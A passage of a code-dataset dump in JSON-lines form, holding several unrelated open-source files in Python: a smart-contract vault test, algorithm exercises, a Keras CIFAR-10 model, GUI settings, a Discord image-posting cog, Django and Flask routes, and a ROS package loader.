cf.SAFEKEEPER.transfer(cf.vault, TEST_AMNT)\n\n args = [\n cfReceiverFailMock.address,\n JUNK_INT,\n JUNK_HEX,\n JUNK_HEX,\n ]\n with reverts(REV_MSG_CFREC_REVERTED):\n signed_call_cf(cf, cf.vault.executexCall, *args)\n\n\n# If user contract catches the external reversion, balances are not affected\ndef test_executexCallEth_tryCatch(cf, cfReceiverTryMock):\n cf.SAFEKEEPER.transfer(cf.vault)\n\n startBalVault = cf.vault.balance()\n startBalRecipient = cfReceiverTryMock.balance()\n\n args = [\n cfReceiverTryMock.address,\n JUNK_INT,\n JUNK_HEX,\n JUNK_HEX,\n ]\n\n tx = signed_call_cf(cf, cf.vault.executexCall, *args)\n assert tx.events[\"FailedExternalCall\"][\"revertString\"] == REV_MSG_CFREC_REVERTED\n\n # Check that ETH amount is transferred to the dstAddress\n assert cf.vault.balance() == startBalVault\n assert cfReceiverTryMock.balance() == startBalRecipient\n","repo_name":"chainflip-io/chainflip-eth-contracts","sub_path":"tests/unit/vault/test_executexCall.py","file_name":"test_executexCall.py","file_ext":"py","file_size_in_byte":3404,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"4761370299","text":"# https://www.acmicpc.net/problem/1744\n\nimport sys\nimport heapq\n\n\ninput = sys.stdin.readline\n\nN = int(input())\n\npositiveHeap = []\nnegetiveHeap = []\npositiveSum = 0\nnegetiveSum = 0\n\nfor i in range(N):\n num = int(input())\n if(num<=0):\n heapq.heappush(negetiveHeap,num)\n else:\n heapq.heappush(positiveHeap,(-num,num))\n\nif(len(positiveHeap) ==1):\n positiveSum = positiveHeap[0][1]\nelse:\n while(len(positiveHeap)>1):\n A = heapq.heappop(positiveHeap)[1]\n B = heapq.heappop(positiveHeap)[1]\n if(A*B >= A+B):\n positiveSum += A*B\n else:\n positiveSum += A+B\n \n\n if(len(positiveHeap)==1):\n positiveSum += positiveHeap[0][1]\n\nif(len(negetiveHeap) ==1):\n negetiveSum = negetiveHeap[0]\nelse:\n while(len(negetiveHeap)>1):\n A = heapq.heappop(negetiveHeap)\n B = heapq.heappop(negetiveHeap)\n negetiveSum += A*B\n\n if(len(negetiveHeap) ==1):\n negetiveSum += negetiveHeap[0]\n\nprint(negetiveSum+positiveSum)","repo_name":"hongju-jeong/python-algorithm","sub_path":"Greedy/P1744_수_묶기.py","file_name":"P1744_수_묶기.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"43671461813","text":"'''\nContains functions to create a serial payload for sending to the PSOC5.\n'''\nfrom enum import Enum\nfrom microserial.constants import EOC\n\n\ndef create_payload(cmd, fn, dformat, data=None):\n '''\n Create payload to be written to the serial port.\n Order must be the same as in console.c, processCommand()\n\n payload - (optional) must be a string\n '''\n b = bytearray()\n b.append(cmd.value)\n b.append(fn.value)\n b.append(dformat.value)\n if data is not None:\n d = data.encode() #convert str to utf8 bytearray\n b.extend(d)\n b.append(ord(EOC))\n return b\n\ndef create_empty_payload():\n b = bytearray()\n b.append(ord(EOC))","repo_name":"designingSparks/microserial","sub_path":"microserial/payload.py","file_name":"payload.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34611759700","text":"from user import User\n\n\njohnny5 = User(\"johnny\", \"five\", \"johnny@five.com\", 69)\njohnny5.enroll().spend_points(50).display_info()\n\nuser1 = User(\"user\", \"one\", \"user@one.com\", 42)\nuser1.enroll().spend_points(80).display_info()\nuser1.enroll()\n\nuser2 = User(\"other\", \"user\", \"other@user.com\", 1337)\nuser2.display_info()\nuser2.spend_points(40)\n\njohnny5.display_balance(0)\njohnny5.add_account(5000000, 0.5).transfer_funds(5000, user2, from_account=1)\n\nuser2.display_balance(0)\n","repo_name":"cptchuckles/codingdojo","sub_path":"python/oop/run_user.py","file_name":"run_user.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36256097431","text":"import numpy as np\r\nfrom keras.utils import to_categorical\r\nfrom tensorflow.keras.datasets import cifar10\r\nfrom tensorflow.keras.layers import Input, Flatten, Dense, Activation, Conv2D, BatchNormalization, Dropout, MaxPooling2D\r\nfrom tensorflow.keras.models import Model, Sequential\r\nfrom tensorflow.keras.optimizers import Adam\r\nimport matplotlib.pyplot as plt\r\nfrom keras import backend as K\r\nfrom tensorflow.keras.layers import LeakyReLU\r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\r\nimport os\r\n\r\ndef plot_loss(history):\r\n plt.plot(history.history['loss'])\r\n plt.plot(history.history['val_loss'])\r\n plt.title('Model loss')\r\n plt.ylabel('Loss')\r\n plt.xlabel('Epochs')\r\n plt.legend(['Train', 'val'], loc = 0)\r\n\r\ndef plot_acc(history):\r\n plt.plot(history.history['accuracy'])\r\n plt.plot(history.history['val_accuracy'])\r\n plt.title('Model accuracy')\r\n plt.ylabel('accuracy')\r\n plt.xlabel('Epochs')\r\n plt.legend(['Train', 'val'], loc=0)\r\n\r\nsave_dir = os.path.join(os.getcwd(), 'saved_model')\r\nmodel_name = 'keras_cifar10_aug_trained_model_upgrade.h5' #.h5/.hdf5 -> keras 대용량 파일 저장과 배포\r\n\r\nimg_rows, img_cols = 32, 32\r\n\r\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\r\n\r\n# CLASSES = np.array(['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'])\r\n# actual_single = CLASSES[y_train]\r\n# plt.imshow(x_train[20], interpolation=\"bicubic\")\r\n# tmp = \"Label:\" + str(actual_single[20])\r\n# plt.title(tmp, fontsize=30)\r\n# plt.tight_layout()\r\n# plt.show()\r\n#tensorflow backend 사용시 (Height, Width, channel)순 입력, Theano backend 사용시 (channel, Height, Width)순 입력\r\nif K.image_dim_ordering() == 'th':\r\n x_train = x_train.reshape(x_train.shape[0], 3, img_rows, img_cols)\r\n x_test = x_test.reshape(x_test.shape[0], 3, img_rows, img_cols)\r\n input_shape = (1, img_rows, img_cols)\r\nelse:\r\n x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 3)\r\n x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 3)\r\n input_shape = (img_rows, img_cols, 3)\r\n\r\nNUM_CLASSES = 10\r\n\r\nx_train = x_train.astype('float32')/255.0\r\nx_test = x_test.astype('float32')/255.0\r\ny_train = to_categorical(y_train, NUM_CLASSES)\r\ny_test = to_categorical(y_test, NUM_CLASSES)\r\n\r\n#모델 만들기\r\n\r\ninput_layer = Input(shape=(32, 32, 3))\r\n\r\nx = Conv2D(32, kernel_size=(3, 3), kernel_initializer='he_normal', strides=1, padding='same', name='Conv1')(input_layer)\r\nx = LeakyReLU()(x)\r\nx = Conv2D(32, kernel_size=(3, 3), kernel_initializer='he_normal', strides=2, padding='same', name='Conv2')(x)\r\nx = LeakyReLU()(x)\r\nx = Dropout(0.5)(x)\r\nx = Conv2D(64, kernel_size=(3, 3), kernel_initializer='he_normal', strides=1, padding='same', name='Conv3')(x)\r\nx = LeakyReLU()(x)\r\nx = Dropout(0.5)(x)\r\nx = Conv2D(64, kernel_size=(3, 3), kernel_initializer='he_normal', strides=2, padding='same', name='Conv4')(x)\r\nx = LeakyReLU()(x)\r\nx = Flatten()(x)\r\nx = Dense(128, kernel_initializer='he_normal')(x)\r\nx = LeakyReLU()(x)\r\nx = Dense(NUM_CLASSES)(x)\r\noutput_layer = Activation('softmax')(x)\r\n\r\nmodel = Model(input_layer, output_layer)\r\nmodel.summary()\r\n#모델 컴파일\r\nopt = Adam(lr=0.0005)\r\nmodel.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy'])\r\n\r\n# data aug\r\ndatagen = ImageDataGenerator(\r\n rotation_range=0.1,\r\n width_shift_range=0.1,\r\n height_shift_range=0.1,\r\n horizontal_flip=True)\r\n\r\n#모델 학습 (aug 적용)\r\nhistory = model.fit_generator(datagen.flow(x_train, y_train, batch_size=16),\r\n steps_per_epoch=x_train.shape[0]/16,\r\n epochs=20,\r\n validation_data=(x_test, y_test),\r\n workers=4)\r\n\r\n#모델 학습 (aug 미적용)\r\n# history = model.fit(x_train, y_train, batch_size=16, epochs=10, verbose=1, validation_split=0.2)\r\n#\r\n\r\n#모델 저장\r\nif not os.path.exists(save_dir):\r\n os.makedirs(save_dir)\r\nmodel_path = os.path.join(save_dir, model_name)\r\nmodel.save(model_path)\r\n\r\n#predict\r\nprint(\"Test start\")\r\nscore = model.evaluate(x_test, y_test)\r\nprint('\\nTest loss:', score[0])\r\nprint('Test accuracy:', score[1])\r\n\r\nplot_loss(history)\r\nplt.show()\r\nplot_acc(history)\r\nplt.show()","repo_name":"junn2e/KSA_Module_6","sub_path":"CIFAR-10_Practice/CIFAR_10_CNN.py","file_name":"CIFAR_10_CNN.py","file_ext":"py","file_size_in_byte":4274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31443504597","text":"import dataclasses\nimport logging\nfrom functools import partial\nfrom typing import Tuple\n\nfrom pygame.rect import Rect\n\nimport pytmx\n\nlogger = logging.getLogger(__name__)\n\ntry:\n from pygame._sdl2 import Texture, Image, Renderer, Window\n import pygame\nexcept ImportError:\n logger.error(\"cannot import pygame (is it installed?)\")\n raise\n\n\n@dataclasses.dataclass(order=True)\nclass PygameSDL2Tile:\n texture: Texture\n srcrect: Rect\n size: Tuple[int, int]\n angle: float = 0.0\n center: None = None\n flipx: bool = False\n flipy: bool = False\n\n\ndef handle_flags(flags: pytmx.TileFlags):\n \"\"\"\n Return angle and flip values for the SDL2 renderer\n\n \"\"\"\n if flags is None:\n return 0.0, False, False\n\n if flags.flipped_diagonally:\n if flags.flipped_vertically:\n return 270, False, False\n else:\n return 90, False, False\n else:\n return 0.0, flags.flipped_horizontally, flags.flipped_vertically\n\n\ndef pygame_sd2_image_loader(renderer: Renderer, filename: str, colorkey, **kwargs):\n \"\"\"\n pytmx image loader for pygame\n\n \"\"\"\n image = pygame.image.load(filename)\n parent_rect = image.get_rect()\n texture = Texture.from_surface(renderer, image)\n\n def load_image(rect=None, flags=None) -> PygameSDL2Tile:\n if rect:\n assert parent_rect.contains(rect)\n else:\n rect = parent_rect\n\n angle, flipx, flipy = handle_flags(flags)\n rect = Rect(*rect)\n size = rect.size\n return PygameSDL2Tile(\n texture=texture,\n srcrect=rect,\n size=size,\n angle=angle,\n center=None,\n flipx=flipx,\n flipy=flipy,\n )\n\n return load_image\n\n\ndef load_pygame_sdl2(renderer: Renderer, filename: str, *args, **kwargs):\n \"\"\"\n Load a TMX file, images, and return a TiledMap class\n\n \"\"\"\n kwargs[\"image_loader\"] = partial(pygame_sd2_image_loader, renderer)\n return pytmx.TiledMap(filename, *args, **kwargs)\n","repo_name":"bitcraft/pytmx","sub_path":"pytmx/util_pygame_sdl2.py","file_name":"util_pygame_sdl2.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":361,"dataset":"github-code","pt":"19"} +{"seq_id":"21809350304","text":"# this file sets up the visualization grid and runs functions that make plots to be put in the grid\n\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport graph_data_improved\n\n# this is the overarching function to graph data, given parameter data:\n# \"data\": [speed, accel, lanes, classes, lengths], where\n# speed: list of speeds at specific time intervals of each trajectory\n# accel: list of accels at specific time intervals of each traj\n# lanes: dic of lane occupations of all trajectories\n# classes: dic of vehicle classes of all trajectories\n# lengths: list of trajectory lengths\n# creates a graph of five subplots\ndef graph(data):\n cur_avg_speed, cur_avg_accel, lanes_occupied, vehicle_classes, lengths = data\n fontsize = 5\n\n figure = plt.figure()\n\n plt.rcParams.update({'font.size': 8})\n plt.subplots_adjust(left = 0.125, right = 0.9, bottom = 0.1, top = 0.9, wspace=0.2, hspace=0.5)\n\n # set up height ratio of grid\n gs = mpl.gridspec.GridSpec(nrows=4, ncols=2, height_ratios=[1,4,4,4])\n\n title = figure.add_subplot(gs[0,0:2])\n title.set_axis_off()\n title.text(0.47,0.5,\"Plots\", fontsize=20, color=\"#808080\")\n\n # make each subplot\n i1 = figure.add_subplot(gs[1,0])\n i2 = figure.add_subplot(gs[1,1])\n i3 = figure.add_subplot(gs[2,0])\n i4 = figure.add_subplot(gs[2,1])\n i5 = figure.add_subplot(gs[3,0])\n\n # graph each subplot\n graph_data_improved.graph_cur_avg_speed(cur_avg_speed, i1)\n graph_data_improved.graph_cur_avg_accel(cur_avg_accel, i2)\n graph_data_improved.graph_lane_occupation(lanes_occupied,i3)\n graph_data_improved.graph_vehicle_class(vehicle_classes,i4)\n graph_data_improved.graph_traj_length(lengths, i5)\n\n\n i6 = figure.add_subplot(gs[3,1])\n i6.tick_params(left = False, right = False , labelleft = False ,\n labelbottom = False, bottom = False)\n\n plt.show()\n\n","repo_name":"janewjsun/research_spring_23","sub_path":"visualization_grid.py","file_name":"visualization_grid.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22410417354","text":"from PySide import QtGui\n\nfrom xldlib.gui.views import widgets\nfrom xldlib.gui.views.widgets import updating\nfrom xldlib.utils import logger\n\nfrom . import base\n\n\n# SECTIONS\n# --------\n\n\n@logger.init('gui', 'DEBUG')\nclass LinkingSection(base.BaseSection):\n '''Section for setting search hit inclusion'''\n\n # SECTION\n # -------\n _title = \"Linking\"\n\n def __init__(self, parent):\n super(LinkingSection, self).__init__(parent)\n\n self.verify()\n self.scan_steps()\n self.precursor_intensity()\n self.add_spacer()\n\n # ITEMS\n\n def verify(self):\n '''Sets a checkbox for whether to verify the precursor scan or not'''\n\n storage = updating.Storage('check_precursor')\n verify = updating.CheckBox(\"Verify Precursor\", self, storage,\n tooltip=\"Verify the precursor m/z exists in precursor scan\")\n\n self.layout.addWidget(verify)\n\n def scan_steps(self):\n '''Sets the scan steps for precursor scan linking'''\n\n hlayout = self.add_layout(QtGui.QHBoxLayout)\n\n label = widgets.Label(\"Max Steps\")\n hlayout.addWidget(label)\n\n storage = updating.Storage('precursor_scan_steps')\n steps = updating.SpinBox(self, storage,\n minimum=5,\n maximum=1000,\n tooltip=\"Maximum scans preceeding the identified product scan\\n\"\n \"to search for the precursor scan.\",\n width=75)\n hlayout.addWidget(steps)\n\n def precursor_intensity(self):\n '''Sets the minimum intensity required for precursor matching'''\n\n hlayout = self.add_layout(QtGui.QHBoxLayout)\n\n label = widgets.Label(\"Max Missing Precursors\")\n hlayout.addWidget(label)\n\n storage = updating.Storage('missing_precursor_threshold')\n intensity = updating.SpinBox(self, storage,\n minimum=0,\n maximum=100,\n tooltip=\"Maximum number (percent) of product scans without\\n\"\n \"linked precursor scans before reporting mismatched files.\",\n suffix='%',\n width=75)\n hlayout.addWidget(intensity)\n\n\n@logger.init('gui', 'DEBUG')\nclass LevelsSection(base.BaseSection):\n '''Section for setting search hit inclusion'''\n\n # SECTION\n # -------\n _title = \"Levels\"\n\n def __init__(self, parent):\n super(LevelsSection, self).__init__(parent)\n\n self.precursor_level()\n self.product_level()\n self.add_spacer()\n\n # ITEMS\n\n def precursor_level(self):\n '''Sets the MS level for the precursor scan data'''\n\n hlayout = self.add_layout(QtGui.QHBoxLayout)\n\n label = widgets.Label(\"Precursor\")\n hlayout.addWidget(label)\n\n storage = updating.Storage('precursor_scan_level')\n level = updating.SpinBox(self, storage,\n minimum=2,\n maximum=10,\n tooltip=\"Precursor Scan Level\",\n prefix='MS',\n width=75)\n hlayout.addWidget(level)\n\n def product_level(self):\n '''Sets the MS level for the product scan data'''\n\n hlayout = self.add_layout(QtGui.QHBoxLayout)\n\n label = widgets.Label(\"Product\")\n hlayout.addWidget(label)\n\n storage = updating.Storage('product_scan_level')\n level = updating.SpinBox(self, storage,\n minimum=2,\n maximum=10,\n tooltip=\"Product Scan Level\",\n prefix='MS',\n width=75)\n hlayout.addWidget(level)\n\n\n# PANES\n# -----\n\n\n@logger.init('gui', 'DEBUG')\nclass ScansPane(base.BaseSettings):\n '''Definitions for scan settings'''\n\n def __init__(self, parent):\n super(ScansPane, self).__init__(parent)\n\n self.layout.addWidget(LinkingSection(self))\n self.layout.addWidget(LevelsSection(self))\n","repo_name":"Alexhuszagh/XLDiscoverer","sub_path":"xldlib/gui/views/discoverer/settings/scans.py","file_name":"scans.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20432678067","text":"import discord\r\nimport os\r\nimport random\r\nfrom discord.ext import commands\r\nfrom discord.ext.commands import Bot\r\n\r\nclass annoy(commands.Cog):\r\n def __init__(self, client):\r\n self.client = client\r\n\r\n @commands.command()\r\n @commands.has_role(\"Not racist\")\r\n @commands.cooldown(5,150, commands.BucketType.channel)\r\n async def spam(self, ctx, folder=\"die\"):\r\n message = ctx.message\r\n bruh=[\"0\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\"]\r\n await message.delete(delay=45)\r\n if (folder==\"hentai\" or folder==\"Hentai\"):\r\n if ctx.channel.is_nsfw():\r\n image = os.listdir('./Spam_commands/Spam/')\r\n for x in bruh:\r\n imgString = random.choice(image) # Selects a random element from the list\r\n path = \"./Spam_commands/Spam/\" + imgString\r\n await ctx.send(file=discord.File(path), delete_after=45)\r\n else:\r\n await ctx.send(f\"That library isn't available in this channel\", delete_after=120)\r\n\r\n if (folder==\"legs\" or folder==\"Legs\"):\r\n image = os.listdir('./Spam_commands/Legs/')\r\n for x in bruh:\r\n imgString = random.choice(image) # Selects a random element from the list\r\n path = \"./Spam_commands/Legs/\" + imgString\r\n await ctx.send(file=discord.File(path), delete_after=45)\r\n\r\n if (folder==\"cringe\" or folder==\"Cringe\"):\r\n image = os.listdir('./Spam_commands/Cringe/')\r\n for x in bruh:\r\n imgString = random.choice(image) # Selects a random element from the list\r\n path = \"./Spam_commands/Cringe/\" + imgString\r\n await ctx.send(file=discord.File(path), delete_after=45)\r\n\r\n if (folder==\"dead\" or folder==\"Dead\" or folder==\"Ded\" or folder==\"ded\"):\r\n image = os.listdir('./Spam_commands/Skeleton/')\r\n for x in bruh:\r\n imgString = random.choice(image) # Selects a random element from the list\r\n path = \"./Spam_commands/Skeleton/\" + imgString\r\n await ctx.send(file=discord.File(path), delete_after=45)\r\n \r\n if (folder==\"rishi\" or folder==\"Rishi\"):\r\n image = os.listdir('./Spam_commands/rishi/')\r\n for x in bruh:\r\n imgString = random.choice(image) # Selects a random element from the list\r\n path = \"./Spam_commands/rishi/\" + imgString\r\n await ctx.send(file=discord.File(path), delete_after=45)\r\n\r\n if (folder==\"cursed\" or folder==\"Cursed\"):\r\n if ctx.channel.is_nsfw():\r\n image = os.listdir('./Spam_commands/Cursed/')\r\n for x in bruh:\r\n imgString = random.choice(image) # Selects a random element from the list\r\n path = \"./Spam_commands/Cursed/\" + imgString\r\n await ctx.send(file=discord.File(path), delete_after=45)\r\n else:\r\n await ctx.send(f\"That library isn't available in this channel\", delete_after=120)\r\n\r\n if (folder==\"die\" or folder==\"die\"):\r\n image = os.listdir('./Spam_commands/die/')\r\n for x in bruh:\r\n imgString = random.choice(image) # Selects a random element from the list\r\n path = \"./Spam_commands/die/\" + imgString\r\n await ctx.send(file=discord.File(path), delete_after=45)\r\n \r\n @spam.error\r\n async def spam_error(self, ctx, error):\r\n if isinstance(error, commands.CommandOnCooldown):\r\n await ctx.send(f'Command is on cooldown', delete_after=120)\r\n if isinstance(error, commands.NSFWChannelRequired):\r\n await ctx.send(f\"That library isn't available in this channel\", delete_after=120)\r\n\r\n \r\ndef setup(client):\r\n client.add_cog(annoy(client))","repo_name":"nalyd1369/Discord-Bot-PY","sub_path":"spam.py","file_name":"spam.py","file_ext":"py","file_size_in_byte":3875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5132870054","text":"# -*- coding: utf-8 -*-\n\ntwitter_base_api_url = \"https://{api}.twitter.com/{version}\"\ntwitter_api_version = \"1.1\"\n\nrequest_methods = {\"get\", \"post\", \"put\", \"delete\", \"patch\", \"option\", \"head\"}\nstreaming_apis = {\"stream\", \"userstream\", \"sitestream\"}\n\nrate_limit_notices = [\n b\"Exceeded connection limit for user\",\n b\"Easy there, Turbo. Too many requests recently. Enhance your calm.\",\n]\n","repo_name":"odrling/peony-twitter","sub_path":"peony/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"19"} +{"seq_id":"32701469477","text":"from django.urls import path\nfrom . import views\n# function based views as debugging resources more reachable\n# linking templates with views\n\nurlpatterns = [\n # = dynamic templates for user unique views via their created data id\n path('', views.index, name='index'),\n path('', views.home, name='home'),\n path('create/', views.create, name='create'),\n path('view/', views.view, name='view'),\n path('existing/', views.create, name='existing'),\n path('delete/', views.delete, name='delete'),\n path('allrecipes/', views.allrecipes, name='allrecipes'),\n path('foodnetwork/', views.foodnetwork, name='foodnetwork'),\n path('food_com/', views.food_com, name='food_com'),\n path('about/', views.about, name='about'),\n path('contact/', views.contact, name='contact')\n]","repo_name":"psiphi-py/CIMI","sub_path":"canImakeIt/main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"33670297266","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport heartsong.settings\n\n\nclass HeartsongPipeline(object):\n def process_item(self, item, spider):\n file = open(\"item.txt\", \"a\")\n file.write(str(item))\n file.write('\\n')\n file.close()\n print(item)\n return item\n","repo_name":"onlyoneprogram/git-python","sub_path":"python/heartsong/heartsong/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3530208500","text":"#!/usr/bin/env python3\nfrom bs4 import BeautifulSoup\nfrom re import sub\n\n\ndef extract_books(soup):\n \"\"\"Extract books from the given soup.\"\"\"\n books = {}\n for d in soup.find_all('div', 'bookMain'):\n asin = sub(r'_.*$', '', d['id'])\n title = d.find('span', 'title').text.strip()\n author = sub(r'by ', '', d.find('span', 'author').text.strip())\n author = sub('\\n', '', author)\n\n books[asin] = dict(asin=asin, title=title, author=author)\n\n return books\n\n\ndef extract_highlights(soup, books):\n \"\"\"Extract highlights from a soup.\"\"\"\n clippings = []\n for d in soup.find_all('div', 'yourHighlight'):\n try:\n clipping_text = d.find('span', 'highlight').text\n clipping_text = sub('\\n', '', clipping_text)\n asin = d.find('span', 'asin').text\n loc = d.find('span', 'end_location').text\n book = books[asin]\n clipping = {\n 'book': '{} ({})'.format(book['title'], book['author']),\n 'clipping_text': clipping_text,\n 'location': loc,\n 'date': '',\n }\n clippings.append(clipping)\n except AttributeError:\n pass\n return clippings\n\n\ndef main():\n with open(\"Highlights.html\") as f:\n soup = BeautifulSoup(f)\n books = extract_books(soup)\n\n clippings = extract_highlights(soup, books)\n for clipping in clippings:\n print(\"\\t\".join([clipping['book'],\n clipping['clipping_text'],\n clipping['location'],\n clipping['date']]))\n\n\nif __name__ == '__main__':\n main()\n\n# vim:set fileencoding=utf-8:\n","repo_name":"neingeist/kindle-to-anki","sub_path":"kindle-html-to-anki.py","file_name":"kindle-html-to-anki.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"19"} +{"seq_id":"9236986842","text":"#!/usr/bin/python\nfrom flask import Flask, render_template\nfrom json import load, loads\nfrom random import randint\nimport requests\nimport os\n\napp = Flask(__name__)\n\nhost = os.getenv('CORE_STACK_SERVICE_HOST')\nport = os.getenv('CORE_STACK_SERVICE_PORT')\n\napi_service = \"http://{}:{}\".format(host, port)\nuserslist = load(open(\"./list.json\", \"r\"))\n\n@app.route(\"/\")\ndef main():\n random = randint(0, len(userslist))\n userid = userslist[random]\n url = \"{}/user/{}\".format(api_service, userid)\n response = requests.get(url=url)\n if response.status_code == requests.codes.get('ok'):\n data = loads(response.json())\n shsid = data.get(\"shsid\")\n url = \"{}/shs/{}\".format(api_service, shsid)\n response = requests.get(url=url)\n if response.status_code == requests.codes.get('ok'):\n data = loads(response.json())\n return render_template(\"index.html\", data=data)\n else:\n return render_template(\"error.html\", data=response.status_code)\n else:\n return render_template(\"error.html\", data=response.status_code)\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port='5000', debug=True)\n","repo_name":"mcaliandro/fogcloud-project","sub_path":"application/dashboard/v1/Dashboard.py","file_name":"Dashboard.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73850952364","text":"# from Python_intermediate.Lesson2Test.parse_content import parse_content\n\nfrom Lesson2Test.parse_content import parse_content\n\ntext = open('contents')\ntext2 = text.read().strip().replace(',', ' ')\ndict = parse_content(text2)\n\ndef make_tree(dict):\n\n tree : dict = {}\n\n words_list = []\n for key in dict.keys():\n words_list.append(key)\n\n numbers = []\n for value in dict.values():\n numbers.append(value)\n\n\n def check_add(id : int, dict : dict, word : str) -> dict:\n new_dict : dict = {}\n char = word[id]\n if id == len(word) - 1:\n if char in dict:\n y = dict[char]\n y['$' + word] = y.get('$' + word, numbers[words_list.index(word)])\n return dict[char]\n else:\n new_dict['$' + word] = numbers[words_list.index(word)]\n dict[char] = new_dict\n return new_dict\n else:\n if char in dict:\n return dict[char]\n else:\n dict[char] = new_dict\n return new_dict\n\n for word in words_list:\n x : dict = tree\n for index in range(len(word)):\n x = check_add(index, x, word)\n\n return tree\n\n# print(make_tree(dict))\n\n# print(tree)\n\n\n\n\n\n\n\n# dict = {'ban': 10, 'band': 5, 'bar': 14, 'can': 32, 'candy': 7}\n\n\n\"\"\"\n{'b': \n {'a': \n {'n': {'$ban': 10, \n 'd': {'$band': 5}}, \n 'r': {'$bar': 14}}},\n 'c': \n {'a': \n {'n': {'$can': 32, \n 'd': \n {'y': {'$candy': 7}}}}}}\n\"\"\"\n\n\n\n\n\n\n\n","repo_name":"grzegorzpikus/Python_Intermediate_exercises_Udacity","sub_path":"Lesson2Test/make_tree.py","file_name":"make_tree.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21143486529","text":"# -*- coding: utf-8 -*-\n__all__ = (\"Package\", \"PackageDatabase\",)\n\nimport os\nimport typing\nimport typing as t\nfrom abc import ABC, abstractmethod\n\nimport attr\nfrom loguru import logger\n\nfrom .action import ActionFormat\nfrom .msg import MsgFormat\nfrom .package_xml.package import PackageDefinition, parse_package_string\nfrom .srv import SrvFormat\n\nif t.TYPE_CHECKING:\n from .. import AppInstance\n\n\nMF = typing.TypeVar(\"MF\", bound=MsgFormat)\nSF = typing.TypeVar(\"SF\", bound=SrvFormat)\nAF = typing.TypeVar(\"AF\", bound=ActionFormat)\n\n\nclass Package(t.Generic[MF, SF, AF], ABC):\n name: str\n path: str\n messages: t.Collection[MF]\n services: t.Collection[SF]\n actions: t.Collection[AF]\n\n @classmethod\n @abstractmethod\n def from_dict(cls, dict: t.Dict[str, t.Any]) -> \"Package\":\n ...\n\n def to_dict(self) -> t.Dict[str, t.Any]:\n d = {\n \"name\": self.name,\n \"path\": self.path,\n \"messages\": [m.to_dict() for m in self.messages],\n \"services\": [s.to_dict() for s in self.services],\n \"actions\": [a.to_dict() for a in self.actions],\n }\n return d\n\n\nPT = typing.TypeVar(\"PT\", bound=Package)\n\n\n@attr.s(frozen=True)\nclass PackageDatabase(t.Generic[PT], ABC, t.Mapping[str, PT]):\n \"\"\"\n An immutable database of packages, represented as :class:`Package`\n instances, indexed by their names, given as :class:`str`.\n\n Note\n ----\n Implements most :class:`dict` operations via\n :class:`abc.collections.Mapping`,\n including :code:`db['name']`, :code:`len(db)`), :code:`db.keys()`,\n :code:`db.values()`, and :code:`iter(db)`.\n As instances of this class are immutable, no destructive\n :class:`dict` operations are provided (e.g., :code:`del db['foo'])`\n and `db['foo'] = bar`).\n \"\"\"\n\n _contents: t.Mapping[str, PT] = attr.ib()\n _definitions: t.Dict[str, PackageDefinition] = attr.ib(factory=dict)\n\n @classmethod\n def from_packages(cls,\n packages: typing.Iterable[PT]\n ) -> \"PackageDatabase[PT]\":\n return cls({p.name: p for p in packages})\n\n @classmethod\n def from_paths(cls,\n app_instance: \"AppInstance\",\n paths: t.List[str],\n ignore_bad_paths: bool = True,\n ) -> \"PackageDatabase[PT]\":\n \"\"\"\n Constructs a package database from a list of the paths of the packages\n belonging to the database.\n\n Parameters\n ----------\n app_instance: AppInstance\n an instance of an application from which to get\n the package database\n paths: List[str]\n a list of the absolute paths of the packages.\n ignore_bad_paths: bool\n If :code:`True`, non-existent paths will be ignored.\n If :code:`False`, a :exc:`FileNotFoundError` will be raised.\n\n Raises\n ------\n FileNotFoundError\n if no package is found at a given path.\n \"\"\"\n packages: t.Dict[str, PT] = {}\n for p in paths:\n try:\n package = cls._build_package(app_instance, p)\n except FileNotFoundError:\n logger.exception(f\"unable to build package: {p}\")\n if not ignore_bad_paths:\n raise\n else:\n if package.name not in packages:\n packages[package.name] = package\n return 